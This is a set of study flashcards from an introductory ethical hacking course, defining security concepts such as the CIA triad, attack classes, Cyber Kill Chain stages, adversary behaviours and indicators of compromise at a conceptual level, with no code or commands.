MODULE 1: Intro to Ethical Hacking Flashcards
What is the assurance that information is accessible only to those authorized to have access?
Confidentiality
What is the trustworthiness of data or resources in terms of preventing improper and unauthorized changes?
Integrity
What is assurance that the systems responsible for delivering, storing, and processing information are accessible when required by the authorized users?
Availability
What refers to the characteristic of a communication, document, or any data that ensures the quality of being genuine?
Authenticity
What is the guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message?
Non-Repudiation
What term refers to the use of information and communication technologies (ICT) to take competitive advantages over an opponent?
Information Warfare or InfoWar
What type of information warfare refers to all strategies and actions to defend against attacks on information and communication technologies assets?
Defensive Information Warfare
What type of information warfare involves attacks against information and communication technologies assets of an opponent?
offensive information warfare
What classification of attack does not tamper with data and involves intercepting and monitoring network traffic and data flow on the target network? (Ex: sniffing, eavesdropping)
Passive Attacks
What classification of attack tampers with data in transit or disrupts communication or services between systems in order to bypass or break into secured systems? (Ex: DoS, MiTM, session hijacking, and SQL Injection)
Active Attacks
What classification of attack is performed when the attacker is in close physical proximity with the target system or network in order to gather, modify, or disrupt access to information? (Ex: social engineering such as eavesdropping, shoulder surfing, and dumpster diving)
Close-In Attacks
What classification of attack involves using privileged access to violate rules or intentionally cause a threat to the organization’s information or information systems? (Ex: theft of physical devices, planting keyloggers, backdoors, and malware)
Insider Attacks
What classification of attack occurs when attackers tamper with hardware or software prior to installation such as at its source or while in transit between source and destination?
Distribution Attack
What methodology is a component of intelligence driven defense for the identification and prevention of malicious intrusion activities by understanding the adversary’s tactics, techniques, and procedures beforehand?
The Cyber Kill Chain Methodology
Which step of the Cyber Kill Chain Methodology involves gathering data on the target to probe for weak points?
Reconnaissance
Which step of the Cyber Kill Chain Methodology involves creating a deliverable malicious payload using an exploit and a backdoor?
Weaponization
Which step of the Cyber Kill Chain Methodology involves sending a weaponized bundle to the victim using email, USB, ect.?
Delivery
Which step of the Cyber Kill Chain Methodology involves exploiting a vulnerability by executing code on the victim’s system?
Exploitation
Which step of the Cyber Kill Chain Methodology involves installing malware on the target system?
Installation
Which step of the Cyber Kill Chain Methodology involves creating a command and control channel to communicate and pass data back and forth?
Command and Control
Which step of the Cyber Kill Chain Methodology involves performing actions to achieve intended objectives/goals?
Actions on Objective
What are the guidelines that describe the way an attacker performs the attack from beginning to the end?
This includes initial exploitation, privilege escalation, and lateral movement.
Tactics
What are the technical methods used by an attacker to achieve intermediate results during the attack classified as?
This includes initial exploitation, setting up and maintaining command and control channels, accessing the target infrastructure, covering the tracks of data exfiltration, ect.?
Techniques
What is the term that describes the organizational approaches that threat actors follow to launch an attack?
Procedures
What term describes the identification of the common methods or techniques followed by an adversary to launch attacks or penetrate an organization’s network?
Adversary Behavioral identification
Which Adversary Behavior points to and adversary already being inside of a target network?
Indicators include the enumeration of systems, hosts, and processes and the execution of various commands to extract information such as local user context, system config, hostname, IP, active remote systems, and processes running.
Internal Reconnaissance
Which Adversary Behavior can be identified by checking windows event logs or PowerShell transcript logs?
Used by an adversary for automating data exfiltration and launching further attacks.
Use of PowerShell
Which Adversary Behavior includes the creation and configuration of multiple domains pointing to the same host allowing an adversary to switch quickly between domains to avoid detection?
Unspecified Proxy Activities
Which Adversary Behavior includes interacting with the target system, browsing files, reading file contents, modifying file content, creating new accounts, connecting to the remote system, and downloading and installing malicious code?
Use of Command Line Interface
Which Adversary Behavior includes modifying the contents of the HTTP user-agent field in order to communicate with the compromised system and execute attacks?
HTTP User Agent
Which Adversary Behavior includes using servers to communicate remotely with compromised systems through an encrypted session in order to steal data, delete data, and launch further attacks?
Command and Control (C2) Server
Which Adversary Behavior includes obfuscating malicious traffic in legitimate traffic carried by common protocols used in the network?
Allows an adversary to communicate with the C2 server, bypass security controls, and perform data exfiltration.
DNS Tunneling
Which Adversary Behavior includes manipulating a web server by creating a shell within a website to gain remote access to the server and perform various tasks such as data exfiltration, file transfers, and file uploads?
Use of Web Shell
Which Adversary Behavior is described as collecting or destroying sensitive data?
Data Staging
What is the term for clues, artifacts, and pieces of forensic data found on the network or OS of an organization that indicates potential intrusion or malicious activity?
Indicators of Compromise
Which indicator of compromise category includes malicious data sent to a target organization or individual?
Email Indicator
Which indicator of compromise category indicates use of a command and control (c2) server, malware delivery, adversary identification of target operating systems, ect.?
Network Indicator